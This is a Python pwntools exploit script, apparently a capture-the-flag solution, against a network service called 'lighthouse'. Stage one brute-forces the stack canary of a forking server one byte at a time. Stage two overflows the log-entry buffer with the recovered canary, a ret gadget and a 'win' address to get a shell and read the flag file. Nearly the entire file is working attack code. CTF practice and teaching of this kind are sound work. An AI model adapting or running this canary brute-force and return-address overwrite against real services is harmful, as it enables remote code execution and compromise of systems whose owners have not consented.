#!/usr/bin/env python3
from pwn import *
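# Distance from the start of the overflowed log-entry buffer to the stack
# canary; everything up to here is filler, the next 8 bytes are the canary.
CANARY_OFF = 136

# Setting context.binary lets p64/u64/flat pick up the binary's architecture
# and endianness.  `elf` itself is not used elsewhere in this script.
elf = context.binary = ELF('./lighthouse', checksec=False)

# CTF challenge endpoint.  A local instance of the service was previously
# reached on 127.0.0.1:9001 when testing the exploit offline.
HOST = 'offsec.m0lecon.it'
PORT = 13535

# Canary bytes recovered so far, least-significant byte first.  On x86-64
# Linux the stack protector keeps the low byte of the canary zero (so that
# string functions stop at it), which is why the search starts with that
# byte already "known" and only the remaining seven need to be guessed.
known = b"\x00"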
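def _canary_oracle(guess: bytes) -> bool:
    """Return True if the service survives *guess* placed right after the buffer.

    A fresh connection is opened, the ``>`` prompt is answered with ``1`` and
    the log entry is filled with CANARY_OFF filler bytes followed by *guess*.
    Only a correct canary prefix leaves the success banner readable; a wrong
    byte should make the stack protector abort the process before it prints.
    The connection is always closed, even if the service drops it mid-way.
    """
    io = remote(HOST, PORT, level='error')
    try:
        io.recvuntil(b'>')
        io.sendline(b'1')
        io.recvuntil(b'entry: \n')
        # send(), not sendline(): the guess must end exactly where the
        # canary ends, a trailing newline would clobber the next byte.
        io.send(b"A" * CANARY_OFF + guess)
        try:
            # b"" when nothing arrives within the timeout (no banner),
            # EOFError when the process has already died.
            data = io.recv(timeout=0.2)
        except EOFError:
            data = b""
    finally:
        io.close()
    return b"Log entry recorded. Over and out." in data


# Stage 1: brute-force the seven unknown canary bytes one at a time, at most
# 256 connections per byte.  This only works if the canary is identical on
# every connection (forking server); a service that starts a new process per
# connection re-randomises it and the search cannot converge.
for i in range(7):
    for bval in range(256):
        guess = known + bytes([bval])
        if _canary_oracle(guess):
            known = guess
            log.success(f"byte {i+1}: {bval:02x}")
            break
    else:
        # Do not carry on with a short `known`: the payload built later would
        # wrap a wrong canary.  Either the canary is not stable across
        # connections, or the 0.2 s recv timeout was too short for a correct
        # guess to show its banner (try a larger timeout on a slow link).
        raise SystemExit(f"canary byte {i+1}: no candidate survived, aborting")

canary = u64(known)
# For re-runs a previously leaked value can be pinned here instead of
# brute-forcing again, e.g. canary = 0xaa0f007629225000.

log.info(f"Canary: {canary:#x}")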
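# Stage 2: same overflow, but now with the real canary so the stack protector
# is satisfied, then overwrite the saved return address.  The fixed 0x40xxxx
# addresses imply a non-PIE binary; the extra `ret` in front of the win
# address is presumably there for 16-byte stack alignment before the call
# (TODO confirm both against the binary if the challenge is rebuilt).
payload = flat(
    b'A' * CANARY_OFF,
    p64(canary),
    b'B' * 8,                    # saved rbp, value irrelevant
    p64(0x000000000040101a),     # ret gadget
    p64(0x0000000000401630),     # win
)

io = remote(HOST, PORT, level='error')
try:
    io.recvuntil(b'>')
    io.sendline(b'1')
    io.recvuntil(b'entry: \n')
    io.send(payload)
    # The win path is expected to hand us a shell; feed it the flag read.
    io.sendline(b'cat /home/user/flag')
    print(io.recvline())
except EOFError:
    # The process died before answering: most likely the canary (or the
    # offset to the return address) is wrong and the stack protector fired.
    log.failure("connection closed before the flag was read; "
                "check the leaked canary and CANARY_OFF")
    raise
finally:
    io.close()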